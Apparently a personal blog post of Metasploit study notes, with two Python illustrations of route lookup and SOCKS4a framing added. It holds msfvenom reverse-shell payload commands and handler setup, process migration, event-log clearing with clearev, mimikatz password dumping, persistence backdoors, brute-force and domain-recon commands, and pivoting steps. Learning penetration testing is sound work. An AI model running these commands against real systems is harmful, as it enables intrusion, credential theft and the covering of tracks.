Metasploit Quick Start



No work today, so I sat in a dark room and read the 100-page book "Metasploit Beginner's Guide"; here I share my notes with everyone. Criticism is welcome, so that we can learn and make progress together.


Metasploit Beginner's Guide


Kali notes



0x01
The basic Metasploit file structure is as follows:


config: Metasploit environment configuration and database configuration information
data: tools and payloads used by the penetration modules, a collection of third-party gadgets, user dictionaries and other data
db: database information generated by Rails compilation for the MSF web framework
documentation: user documentation and development documentation
external: some basic expansion modules of Metasploit
lib: Metasploit's basic classes and third-party module classes
log: system information and other information written by Metasploit at runtime
modules: Metasploit's system tool modules, including auxiliary modules (auxiliary), penetration modules (exploits), attack payloads (payloads), post-exploitation modules (post), NOP modules (nops) and encoding modules (encoders)
msfbinscan: scans binary files for offset addresses
msfconsole: Metasploit's basic command line, which integrates all of its functions
msfelfscan: scans Linux ELF files for offset addresses

msfmachscan: same function as msfelfscan
msfpescan: scans Windows PE format files for offset addresses
msfvenom: combines the features of msfpayload and msfencode and replaces both, more efficiently
plugins: Metasploit's third-party plug-in interface
scripts: common Meterpreter post-exploitation scripts; unlike the post modules under modules, they need no post parameter or absolute path and can be run directly


0x02
search: searches your Metasploit installation for a module.
use: selects a module or payload to work with.
show options: displays the module's configurable settings.
info: displays all the detailed information about the module.
set: sets a basic option such as the target, for example set TARGET 1 or set SESSION 1.
back: returns from the current module so that a new one can be selected with use.
exit: exit and back differ: back returns to the previous context, exit quits.
kill: kills a process.



0x03
Scanning phase: to view scan results conveniently, the PostgreSQL database must be running.
search portscan
use <module>
show options
run



0x04
Generating payloads with msfvenom
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.105.1 lport=8099 -f exe > shell.exe



0x05
msfvenom encoding generation
HTTPS payload: gets through firewall settings
payload_inject: injects a payload (equivalent to injecting another payload into the existing session to get back a new session ID)
Auto RDP port: automatically opens 3389, and can also open any other port
inject in memory: injects into RAM



0x06
Android payload Generation



0x07
Cobaltstrike
A GUI-based penetration testing framework built on Metasploit.



0x08
Meterpreter commands are divided into:
1. Core commands
2. stdapi file commands
3. stdapi networking commands
4. stdapi user interface commands
5. stdapi webcam commands
6. stdapi file system commands
7. priv elevate (privilege) commands
8. priv password database commands
9. priv timestomp commands
Attacking Win7:

/var/www/html# msfvenom -p windows/meterpreter/reverse_https lhost=192.168.105.1 lport=6745 -f exe > win.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 502 bytes
Final size of exe file: 73802 bytes



msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.105.1
msf exploit(handler) > set LPORT 6745
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 1



migrate command
Moves the Meterpreter from its current process on the target machine into another process.
meterpreter > getpid
Current pid: 3232
meterpreter > run post/windows/manage/migrate



[*] Running module against PC-20170804GGMB
[*] Current server process: win.exe (3232)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3356
[+] Successfully migrated to process 3356



Script commands: run checkvm checks whether the remote host is a virtual machine or a physical host.
run getgui: command to add a user.
run vnc: view the remote desktop.
run packetrecorder -i 0: capture all traffic of the target system and record the packets.
load mimikatz
clearev: clears the event logs.



0x09
Part one: obtaining a Meterpreter session.
1. First generate an executable file:
# msfvenom -p windows/meterpreter/reverse_https lhost=192.168.105.1 lport=8934 -f exe > She.exe


No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 543 bytes
Final size of exe file: 73802 bytes

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(handler) > set LPORT 8934
LPORT => 8934
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j

Part two: basic Meterpreter tunnelling and proxying
portfwd is the basic port forwarding that Meterpreter provides: it forwards a single port back to the local machine and listens on it.
A pivot is the most commonly used form of proxying with Meterpreter: it can easily route your machine into the victim's internal network. Pivot usage is introduced below. Usage: route add adds a temporary routing table entry.
Add a routing entry in Metasploit so that 10.1.1.129 is reached through Meterpreter session 1.
meterpreter > route
meterpreter > run get_local_subnets        (view the route segments)
10.1.1.129 255.255.255.255 1               (this is our route segment)
msf exploit(handler) > route add 10.1.1.129 255.255.255.255 1    (add the route locally)
route print
===============================
Subnet        Netmask          Gateway
10.1.1.129    255.255.255.255  Session 1


If you want to route the whole 10.1.1.129/24 network through session 1, write it the same way.
With the pivot configured, scanning 10.1.1.129 from MSF (db_nmap) or accessing it (psexec module, SSH module) goes through session 1. But what if you want other applications to go through this proxy as well? Metasploit's socks4a module provides a listening tunnel that other applications can connect through.
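As an added illustration (not from the original notes or from Metasploit's code), this is how a route table of the kind shown by route print decides which session a destination is sent through: each entry is matched by subnet and netmask and the most specific match wins, which is why a 255.255.255.255 entry covers only 10.1.1.129 while a 255.255.255.0 entry covers the whole /24. The route print text and the second /24 route are constructed samples.

```python
import ipaddress

# Constructed sample of `route print` output in the shape shown in the notes;
# a second /24 route is added to show how a narrow and a broad route compete.
ROUTE_PRINT_SAMPLE = """\
IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.1.1.129         255.255.255.255    Session 1
   10.1.1.0           255.255.255.0      Session 2
"""


def parse_route_print(text):
    """Parse `route print` text into (subnet, netmask, session_id) tuples."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        # Data rows look like: <subnet> <netmask> Session <id>
        if len(parts) == 4 and parts[2] == "Session" and parts[3].isdigit():
            routes.append((parts[0], parts[1], int(parts[3])))
    return routes


def session_for(dest, routes):
    """Return the session a destination is pivoted through, or None when it is
    reached directly. A route matches when dest lies in subnet/netmask; if
    several match, the longest netmask (most specific route) wins, so the /32
    entry for 10.1.1.129 beats the /24 entry covering the rest of 10.1.1.0."""
    addr = ipaddress.IPv4Address(dest)
    best_net, best_session = None, None
    for subnet, netmask, session in routes:
        net = ipaddress.IPv4Network((subnet, netmask), strict=False)
        if addr in net and (best_net is None or net.prefixlen > best_net.prefixlen):
            best_net, best_session = net, session
    return best_session


if __name__ == "__main__":
    table = parse_route_print(ROUTE_PRINT_SAMPLE)
    for host in ("10.1.1.129", "10.1.1.50", "192.168.105.1"):
        print(host, "->", session_for(host, table))
```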



First use socks4a and configure its listening port:
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options


Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT                   yes       The port to listen on.


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy


msf auxiliary(socks4a) > exploit -y
[*] Auxiliary module execution completed
msf auxiliary(socks4a) >
[*] Starting the SOCKS4A proxy server


To view the listening port:
msf auxiliary(socks4a) > netstat -ano | grep "1080"
[*] exec: netstat -ano | grep "1080"

tcp  0  0  0.0.0.0:1080  0.0.0.0:*  LISTEN  off (0.00/0/0)


The port is listening; next configure proxychains.
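As an added example (not from the original notes and not Metasploit's own code), here is the byte layout of the SOCKS4a exchange that the module above serves: the client's CONNECT request, including the 0.0.0.x DSTIP marker that asks the proxy to resolve a hostname on its own side (which is what lets a proxied application reach names inside the pivoted network), and the 8-byte reply. Host names, ports and user ids are constructed samples.

```python
import socket
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 0x5A   # request granted
REPLY_REJECTED = 0x5B  # request rejected or failed

def build_connect_request(host, port, userid=b""):
    """Client -> proxy: VN=4, CD=1, DSTPORT, DSTIP, USERID NUL [DOMAIN NUL].
    For a hostname the SOCKS4a extension puts 0.0.0.x in DSTIP and appends the
    name after USERID, so the proxy resolves it (here, from inside the pivot)."""
    try:
        dst_ip, domain = socket.inet_aton(host), b""          # IPv4 literal: plain SOCKS4
    except OSError:
        dst_ip, domain = b"\x00\x00\x00\x01", host.encode() + b"\x00"
    return struct.pack("!BBH", SOCKS_VERSION, CMD_CONNECT, port) + dst_ip + userid + b"\x00" + domain

def parse_connect_request(data):
    """Proxy side: return (cmd, port, host, userid); ValueError on malformed input."""
    if len(data) < 9 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS4 request")
    cmd, port = struct.unpack("!BH", data[1:4])
    dst_ip, rest = data[4:8], data[8:]
    end = rest.find(b"\x00")
    if end < 0:
        raise ValueError("unterminated USERID")
    userid, rest = rest[:end], rest[end + 1:]
    if dst_ip[:3] == b"\x00\x00\x00" and dst_ip[3] != 0:   # SOCKS4a hostname marker
        end = rest.find(b"\x00")
        if end < 0:
            raise ValueError("unterminated DOMAIN")
        host = rest[:end].decode()
    else:
        host = socket.inet_ntoa(dst_ip)
    return cmd, port, host, userid

def build_reply(granted, port=0, ip="0.0.0.0"):
    """Proxy -> client: VN=0, CD=0x5A or 0x5B, DSTPORT, DSTIP (8 bytes total)."""
    code = REPLY_GRANTED if granted else REPLY_REJECTED
    return struct.pack("!BBH", 0, code, port) + socket.inet_aton(ip)

def parse_reply(data):
    """Client side: return (granted, port, ip) from the 8-byte reply."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError("not a SOCKS4 reply")
    code, port = struct.unpack("!BH", data[1:4])
    return code == REPLY_GRANTED, port, socket.inet_ntoa(data[4:8])
```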



0x10
Maintaining access. Metasploit's own backdoors are not very convenient to use; we recommend keeping control with an external third-party backdoor.
The backdoors that come with MSF:
persistence
metsvc
scheduleme & schtasks



0x11
Information gathering
To gather information well and view the results conveniently, do three things when starting msfconsole: start the database, check the database, and connect to the database.


Port scan: search portscan
Currently two scan modes: SYN/TCP

smb_version: identifies the Windows version
use auxiliary/scanner/smb/smb_version

mssql_ping: by default MSSQL listens on TCP port 1433 or on a random TCP port; if it listens on a random port, you can query UDP port 1433 to find out which port it is listening on.
use auxiliary/scanner/mssql/mssql_ping

ssh_version: identifies the SSH software version
auxiliary/scanner/ssh/ssh_version

ftp_version: finds FTP servers in the target network

Brute force

Dictionaries that ship with Kali:
/usr/share/metasploit-framework/data/wordlists


auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/http/tomcat_mgr_login


Assuming the Tomcat account password is brute-forced successfully, a shell can be obtained with:
exploit/multi/http/tomcat_mgr_deploy


Common Metasploit service probing modules:


Port scan

auxiliary/scanner/portscan
scanner/portscan/ack
scanner/portscan/ftpbounce: FTP bounce port scan
scanner/portscan/syn
scanner/portscan/tcp
scanner/portscan/xmas: TCP "XMAS" port scan

SMB scan

auxiliary/scanner/smb/smb_enumusers: SMB enumeration
auxiliary/scanner/smb/pipe_dcerpc_auditor: returns DCERPC information
auxiliary/scanner/smb/smb2: scans for the SMB2 protocol
auxiliary/scanner/smb/smb_enumshares: scans SMB shares
auxiliary/scanner/smb/smb_enumusers: enumerates users on the system
auxiliary/scanner/smb/smb_login: SMB login
use windows/smb/psexec: SMB login
auxiliary/scanner/smb/smb_lookupsid: scans the users of the group
auxiliary/scanner/smb/smb_version: scans the system version

MSSQL scan


admin/mssql/mssql_enum: MSSQL enumeration
admin/mssql/mssql_exec: MSSQL command execution
admin/mssql/mssql_sql: MSSQL query
scanner/mssql/mssql_login: MSSQL login tool
There is also a mssql_payload module


SMTP scan

auxiliary/scanner/smtp/smtp_enum: SMTP enumeration
auxiliary/scanner/smtp/smtp_version: scans SMTP versions

SNMP scan

auxiliary/scanner/snmp/community: scans devices through SNMP
scanner/snmp/community: SNMP scan

SSH scan

auxiliary/scanner/ssh/ssh_login: SSH login
auxiliary/scanner/ssh/ssh_login_pubkey: SSH public key authentication login
auxiliary/scanner/ssh/ssh_version: scans the SSH version

Telnet scan

auxiliary/scanner/telnet/telnet_login: Telnet login
auxiliary/scanner/telnet/telnet_version: Telnet version

TFTP scan

auxiliary/scanner/tftp/tftpbrute: scans for TFTP files
scanner/ftp/anonymous: anonymous FTP scan

ARP scan


auxiliary/scanner/discovery/arp_sweep
auxiliary/scanner/discovery/udp_probe: scans hosts for UDP services
auxiliary/scanner/discovery/udp_sweep: detects commonly used UDP services
auxiliary/sniffer/psnuffle: password sniffer



scanner/vnc/vnc_none_auth: scans for VNC services without authentication


Web server information scanning modules

Under auxiliary/scanner/http: http_version, open_proxy, robots_txt, frontpage_login, tomcat_administration, tomcat_utf8_traversal, options, drupal_views_user_enum, scraper, svn_scanner, trace, vhost_scanner, webdav_internal_ip, webdav_scanner, webdav_website_content

File and directory scanning modules

Under auxiliary/scanner/http: backup_file, brute_dirs, copy_of_file, dir_listing, dir_scanner, dir_webdav_unicode_bypass, file_same_name_dir, files_dir, http_put, ms09_020_webdav_unicode_bypass, prev_dir_same_name_file, replace_ext, soap_xml, trace_axd, verb_auth_bypass


auxiliary/scanner/dos/http/apache_range_dos


Web application scanning modules

auxiliary/scanner/http/blind_sql_query
auxiliary/scanner/http/error_sql_injection
auxiliary/scanner/http/http_traversal
auxiliary/scanner/http/rails_mass_assignment
exploit/multi/http/lcms_php_exec


0x12
Reverse Meterpreter
Try to take the 2012 server
Try privilege escalation with the current account

net user /domain
net group "Domain Computers" /domain
net group "Domain Admins" /domain    (view the domain admins)
net localgroup Administrators
net view /domain
Analyse the information and obtain permissions on one server
mimikatz to fetch plaintext passwords
View details of the captured users: net user xxx /domain



Attempt to use domain token impersonation
Leverage SMB delivery
1. Use the two user accounts currently acquired to scan quickly
2. smb_login scan
3. Port forwarding into the intranet
4. Meterpreter port forwarding
5. MSF socks4a forwarding


https://www.zybuluo.com/jasun/note/841229 is good. I'm hungry, I want to eat.

